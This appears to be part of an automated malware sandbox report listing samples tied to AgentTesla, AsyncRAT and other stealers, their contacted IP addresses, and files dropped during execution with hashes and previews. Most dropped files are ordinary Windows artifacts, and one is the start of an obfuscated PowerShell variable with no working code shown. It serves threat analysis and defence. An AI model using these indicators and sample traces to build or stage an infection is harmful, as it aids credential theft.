	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	142.251.15.132 149.154.167.220 172.67.74.152
	Database4.exe	Get hash	malicious	Unknown	Browse	142.251.15.132 149.154.167.220 172.67.74.152
	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse	142.251.15.132 149.154.167.220 172.67.74.152

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.830716815425097
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugq:gJjJGtpTq2yv1AuNZRY3diu8iBVqFw
MD5:	7FF2FBCC7016A934A1D1E7BC41E3FEFE
SHA1:	CD3DCBD6F1B4878FB6C77F1FBD940043AC949D3F
SHA-256:	9EBA82080390D9DF80522F4578380F05AD9FDD448A825476FE705A0223C21114
SHA-512:	4B6C77BB6E6A4D713B60FEA0A8EF824A26695C530E4CB5FA38C01D4B8D37225A20D1822F8336D1AC72273555E17F66FB4D23DE9F40C14ED03C90107EE06534D8
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0d960b90, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585882988185752
Encrypted:	false
SSDEEP:	1536:ZSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Zaza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	1FC211FCEE986FF7DC70E3B4C3783B29
SHA1:	7FD90BD756C32835DD2613B7FE6EC54703D79422
SHA-256:	B4738337A9A06BE793C3E38F732D2F444F6701FA2D278D90A59A04DEE1EE0D56
SHA-512:	CAC9AE0DE2BB643BE779C1E175E14AB19A8A7D9DDDB1D47D1D8B753F219D902824E4F5A21A149900B73AFB6767642DCC24AB8D71D15AB1F77A761B23B5506DC1
Malicious:	false
Preview:	....... ...............X\...;...{......................0.z..........{.......\|O.h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{.....................................Y.....\|O.................>.x}.....\|O..........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08166291377185073
Encrypted:	false
SSDEEP:	3:4SllyYeNvwkbGuAJkhvekl1Dpl/lAllrekGltll/SPj:ZyzNHbrxlptAJe3l
MD5:	43C9FA5C6C8999EA624264384D389EF2
SHA1:	7C3212BA84E0933E1D09B1C76AAB25442719C84E
SHA-256:	5DEFD7BC28B583CFBBD7E700EFB7C3552EAAFABFE0D8754493B518B2CD9D5794
SHA-512:	0FDE8A47C46750F1EA48BE022BA1F95940384150B169F1393FA74B35F40AF8655ED66A926A634844000441280F90C5F041B485F730DB374B4BA253C94947E8B3
Malicious:	false
Preview:	._R......................................;...{.......\|O......{...............{.......{...XL......{..................>.x}.....\|O.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_114f36841bde2782ceb5e919255ae3656018f8_00000000_7261f982-655b-4a37-acb2-62dfc002047e\Report.wer

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8016212931248858
Encrypted:	false
SSDEEP:	192:7DuDpe3uSRvT0ia5m9TMlzuiF4Z24IO8:WdSRvT3avzuiF4Y4IO8
MD5:	26237C47C1AF24A1DC5347C294D9B314
SHA1:	BB8C108436AC745FD1904917EFF8DABF7D97CD24
SHA-256:	F6844DA89B867A72A5925063339D822E68E5434BA86B6297ED65AE196075C548
SHA-512:	D5C8F94E9553259C961CADBB57098378FCB4C097742C5CC9AC3F0D7EC3A6906F24F175CB0EB68EA98353C5E54AA4B05A0ADC030BAE421967CDF380DDBAA3EC43
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.3.8.0.7.9.6.0.7.0.4.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.3.8.0.8.0.4.5.0.7.9.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.6.1.f.9.8.2.-.6.5.5.b.-.4.a.3.7.-.a.c.b.2.-.6.2.d.f.c.0.0.2.0.4.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.c.c.-.0.0.0.1.-.0.0.1.4.-.c.0.7.7.-.5.9.3.1.3.2.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_114f36841bde2782ceb5e919255ae3656018f8_00000000_cfb088d1-9e20-4517-9a57-fc120c8b9284\Report.wer

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8015944732184409
Encrypted:	false
SSDEEP:	96:BVFUZeaAuNRs9lqHzxOMb5dQXIFdk+BHUHZopAnQHdE7HeSVcf+xnj+dF9yOyW0F:zCZe3uNRvT0ia5m9TMlzuiF4Z24IO8x
MD5:	3296E92CD1911DF10C738247950616FC
SHA1:	AD588E6CCC0417BC8048DC18915C50FAF8335211
SHA-256:	F3F98770212A6FE0F45D9DBD857D79814E0062BEA9E8F047DA5702895FFBCE48
SHA-512:	46B34A2BBE0A20D7004641FA41FFF385157E8B6B290EFEBFBE3449A779BD03423FE98951D9609F2F71288E438F4DBBC44186D177F42571ADE1EF0184C256441B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.3.8.0.7.9.6.2.1.1.5.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.3.8.0.8.0.4.6.4.9.1.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.b.0.8.8.d.1.-.9.e.2.0.-.4.5.1.7.-.9.a.5.7.-.f.c.1.2.0.c.8.b.9.2.8.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.4.c.-.0.0.0.1.-.0.0.1.4.-.a.3.3.b.-.5.1.3.1.3.2.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC12.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7622
Entropy (8bit):	3.7049796276777447
Encrypted:	false
SSDEEP:	192:R6l7wVeJZR6LW6Y2ySUegmfhC1p1qa1fgPOm:R6lXJ/666YTSUegmfhCZqwfo
MD5:	85C3F56777A84FCB270103A43C60FAFE
SHA1:	955488F1B1908516BF691A2C0CCA0A2E4DEAEDA0
SHA-256:	F051CBC36DD09FE9A58DCDE2C3D3379AE432F83069835E5076F3A4F6050D289C
SHA-512:	35D85452FAE39A0A5476D812193B626EFDF9488795CCB31499BB0BF7DEA4FC4CF5C4197B8D8BE09FAF245EB9CD53D3797E65C3FC4F766F2C6D5828478CBC253A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC22.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7622
Entropy (8bit):	3.7050656558098565
Encrypted:	false
SSDEEP:	192:R6l7wVeJJ860K6Y2uSUegmfhC1p1qV1fIOm:R6lXJy6h6Y/SUegmfhCZq3f4
MD5:	E78DF67587A91380F10C1202120C9705
SHA1:	C214F746653ED5B6C1F83A48C05950525F2D16A4
SHA-256:	1D23D583B40139E2D278B93D74C5A77B88AD2A246E2B25A9064F76E57007DD27
SHA-512:	8E68FC04D90E92D5427D1643591E4FFA857AA00DA91B44CB0DB354AA8483F9F542E87073958DDE9F67620F8D2FC3B01BEB6F73C0CF297D554F4DE02B32244182
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.1.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC62.tmp.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4614
Entropy (8bit):	4.494763745469648
Encrypted:	false
SSDEEP:	48:cvIwWl8zsUJg77aI9tKWpW8VYZPYm8M4JFKf7axiFm+q8L/slnk8gkd:uIjfSI7zr7VQSJFKk9aQnk8gkd
MD5:	19E9FF7CF3B0D5E6A131AEF4406A9FB3
SHA1:	77C4550C1D08B0050A0F70BFFC3C7ED9603A2416
SHA-256:	AFD3EE6A04EC33E5ED3368C3D463564F98CD7E87CF23853255C07D29A6514CBE
SHA-512:	2F6CCCB2C4866C8D3F0AA25F53EFAA79681026417768BD156C42261A781A6A23A6DFA0E90EB5A56245D024CC1BB22753ACEBD280BC98F5301FF88497147FF691
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295684" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC71.tmp.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4614
Entropy (8bit):	4.495347386274018
Encrypted:	false
SSDEEP:	48:cvIwWl8zsUJg77aI9tKWpW8VYTYm8M4JFKf7axiF0+q8L/sZnk8gXd:uIjfSI7zr7VrJFKkHaknk8gXd
MD5:	604FB848D4DEC95954A8E25620643D55
SHA1:	4860A063C903E229FBD93E1D520B5B25C592079D
SHA-256:	B8D190DB9A5A38F66402DACB8AF142C4B3802E1BBD57920E28E9E0B4D84CC8C4
SHA-512:	3896C770BA3C10FA41C032422541FC6CBC4262501909A8A529CE280996152FAFDEE35BA63B8DCF37909D071945445326BD32D5598E7B7FFADA0B590A7B9A13C1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295684" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\nippleskulcha\thukanthukai.~!!@@!!@@!!~

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65535)
Category:	dropped
Size (bytes):	4045460
Entropy (8bit):	2.39103440552274
Encrypted:	false
SSDEEP:	3072:bR69Sqe86QEjrBRYh+bPyML500Q5/hSP2HwYhExjDMI8xYluuibk5M5Tx4juSGT2:T
MD5:	8836EA97B19F38697FDC5ABA802DA2CD
SHA1:	534969E661337D6BE8C23AE1415EC2F761061FE7
SHA-256:	E2EBFCCFFC4AB283858C6E57CCD88D676BE070FAE1E96C2ED82DFCFCDB1C1346
SHA-512:	9E24FCFAC6E45C529FF5F001E10CB11E19A54822387D6CE9F66912DC8956C93845B5C1240E8628595E78FA6C846C28B042DC59211246861CB2722AB870C21D62
Malicious:	false
Preview:	.$muthal = "****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\error[1]

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3249
Entropy (8bit):	5.4598794938059125
Encrypted:	false
SSDEEP:	96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
MD5:	939A9FBD880F8B22D4CDD65B7324C6DB
SHA1:	62167D495B0993DD0396056B814ABAE415A996EE
SHA-256:	156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
SHA-512:	91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
Malicious:	false
Preview:	...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\error[1]

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3249
Entropy (8bit):	5.4598794938059125
Encrypted:	false
SSDEEP:	96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
MD5:	939A9FBD880F8B22D4CDD65B7324C6DB
SHA1:	62167D495B0993DD0396056B814ABAE415A996EE
SHA-256:	156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
SHA-512:	91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
Malicious:	false
Preview:	...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	47721
Entropy (8bit):	5.076853549369968
Encrypted:	false
SSDEEP:	768:JQDWxeV3IpNBQkj2Nh4iUxgaVrfrRJv5FkvQOZhJHIeaardFHXwdOdBJNLzItAHs:+DweV3CNBQkj2Nh4iUxgaVrflJnkvQOM
MD5:	EDE6B3F24EA7BE15563286F40FC4E154
SHA1:	A1AAC33614FF3D10E4F91C1FE7A386D15AA629D8
SHA-256:	0CA18ED43FBACE5B2CD84E02292F9DA7A879069BDC7C89FF36A02D411D467BA9
SHA-512:	9F53AD9EF9748AC7FDA6AF264AA5F367B1B0E09C3ADB869BE1E88651A5695747D650D83F387B55FD0113BEF3F228D723DAAE3CF59EAE5C3BC5243004EC3E3806
Malicious:	false
Preview:	PSMODULECACHE.I........z..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........mM.}.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0zaed2l.pp3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edu1cji2.000.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhcrz10j.ok1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrbozbkd.tgm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

